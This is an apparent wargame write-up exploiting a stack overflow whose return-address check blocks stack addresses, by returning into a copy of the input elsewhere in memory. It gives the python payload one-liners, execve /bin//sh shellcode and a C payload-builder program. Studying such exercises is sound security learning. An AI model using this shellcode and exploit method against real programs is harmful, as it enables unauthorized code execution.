__builtin_return_address(0) returns the saved return address of the current function: the value the RET instruction pops off the stack and jumps to when the function ends. This is the word a stack buffer overflow usually overwrites.

This exercise is a simple buffer overflow, but the return address is checked. It must not be an address from the 0xbf000000 section, which is where the stack lives, so we cannot return straight into shellcode stored on the stack. We have to find another place from which our shellcode can be executed.

The program copies the passed argument, and that copy may live somewhere else in memory. If that place lies outside the 0xbf000000 section, its address passes the check and we can return into the copy instead.

First I created the input file and determined the position of the return address in it, then I crashed the application and loaded the core dump into gdb.

$ echo `python -c 'print "\x41"*80 + "\x42\x42\x42\x42" + "\x43"*100'` > /tmp/1

I listed the segments and searched them for the 0x43 bytes, i.e. for the 0x43434343 pattern. This memory range gave a hit:

(gdb) find /b 0xb7fde000, 0xb7fe2000, 0x43434343

[screenshot screen-shot-2016-12-01-at-0-21-46: gdb output of the find command]

Then I updated the input: the return address became 0xb7fde054 (little-endian \x54\xe0\xfd\xb7), the first 0x43 byte directly after the four 0x42s in the copy, and the 0x43 padding was replaced with the shellcode, so the shellcode now starts at exactly that address. The shellcode closes fd 0, opens /dev/tty (which becomes the new fd 0, so the spawned shell reads its commands from the terminal) and then execs /bin//sh.

$ echo `python -c 'print "\x41"*80 + "\x54\xe0\xfd\xb7" + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` > /tmp/1

[screenshot screen-shot-2016-12-01-at-0-29-28: running the program with the final /tmp/1]
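As an added example (my own code, not part of the original write-up and not the exercise's source), the following C program builds the same input file as the Python one-liner above and makes two things explicit that the text only describes: how a function can inspect its own saved return address with __builtin_return_address(0), and the layout of the payload (80 bytes of padding, the 4-byte return address packed little-endian, then the shellcode). The in_forbidden_range rule is my reconstruction of the restriction described at the top of the page (reject anything in the 0xbf000000 section); the exercise's real check is not shown on this page. The padding length, the address 0xb7fde054 and the shellcode bytes are copied from the write-up; the open() flags 0x2712 are kept as they appear in the shellcode.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shellcode bytes from the write-up (copied and annotated here):
 * close(0); open("/dev/tty", 0x2712); execve("/bin//sh", {"/bin//sh", NULL}, NULL)
 * open() returns the lowest free descriptor, so /dev/tty becomes the shell's fd 0. */
static const unsigned char shellcode[] =
    "\x31\xc0"            /* xor  eax, eax                          */
    "\x31\xdb"            /* xor  ebx, ebx         ; fd 0           */
    "\xb0\x06\xcd\x80"    /* mov  al, 6 ; int 0x80 ; close(0)       */
    "\x53"                /* push ebx              ; NUL terminator */
    "\x68/tty"            /* push "/tty"                            */
    "\x68/dev"            /* push "/dev"                            */
    "\x89\xe3"            /* mov  ebx, esp         ; "/dev/tty"     */
    "\x31\xc9"            /* xor  ecx, ecx                          */
    "\x66\xb9\x12\x27"    /* mov  cx, 0x2712       ; open flags     */
    "\xb0\x05\xcd\x80"    /* mov  al, 5 ; int 0x80 ; open() -> 0    */
    "\x31\xc0"            /* xor  eax, eax                          */
    "\x50"                /* push eax              ; NUL terminator */
    "\x68//sh"            /* push "//sh"                            */
    "\x68/bin"            /* push "/bin"                            */
    "\x89\xe3"            /* mov  ebx, esp         ; "/bin//sh"     */
    "\x50"                /* push eax              ; argv[1] = NULL */
    "\x53"                /* push ebx              ; argv[0]        */
    "\x89\xe1"            /* mov  ecx, esp         ; argv           */
    "\x99"                /* cdq                   ; edx = NULL     */
    "\xb0\x0b\xcd\x80";   /* mov  al, 11 ; int 0x80 ; execve()      */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* drop the literal's NUL */

#define PAD_LEN   80               /* bytes before the saved return address */
#define PAD_BYTE  0x41
#define COPY_ADDR 0xb7fde054u      /* address of the copy found with gdb's find */

/* Assumption: reconstruction of the rule described in the write-up. A return
 * address in the 0xbf000000 section (the stack) is refused. Shifting instead
 * of masking keeps this false for any 64-bit address when built on x86-64. */
int in_forbidden_range(uintptr_t addr) {
    return (addr >> 24) == 0xbf;
}

/* How a program can look at its own saved return address: level 0 of
 * __builtin_return_address is the address RET will jump to. */
__attribute__((noinline)) int returning_into_stack(void) {
    uintptr_t ra = (uintptr_t)__builtin_return_address(0);
    return in_forbidden_range(ra);
}

/* Little-endian packing: 0xb7fde054 becomes the bytes 54 e0 fd b7. */
void put_le32(unsigned char *dst, uint32_t v) {
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Lay out padding | return address | shellcode. Returns the payload length,
 * or 0 if the buffer is too small or ret would fail the target's check. */
size_t build_payload(unsigned char *out, size_t cap, uint32_t ret) {
    size_t need = PAD_LEN + 4 + SHELLCODE_LEN;
    if (cap < need || in_forbidden_range(ret))
        return 0;
    memset(out, PAD_BYTE, PAD_LEN);
    put_le32(out + PAD_LEN, ret);
    memcpy(out + PAD_LEN + 4, shellcode, SHELLCODE_LEN);
    return need;
}

/* Usage: ./mkpayload > /tmp/1  (the trailing newline matches what echo wrote) */
int main(void) {
    unsigned char buf[256];
    size_t n = build_payload(buf, sizeof buf, COPY_ADDR);
    if (n == 0) {
        fputs("refusing to build: address fails the return-address check\n", stderr);
        return 1;
    }
    fwrite(buf, 1, n, stdout);
    fputc('\n', stdout);
    return 0;
}
```

Because the builder applies the same rule as the target, a stack address such as 0xbffff000 is rejected before a useless file is written, while 0xb7fde054 (the copy outside the stack) goes through; the 139 payload bytes are 80 times 0x41, the four address bytes, and the 55-byte shellcode.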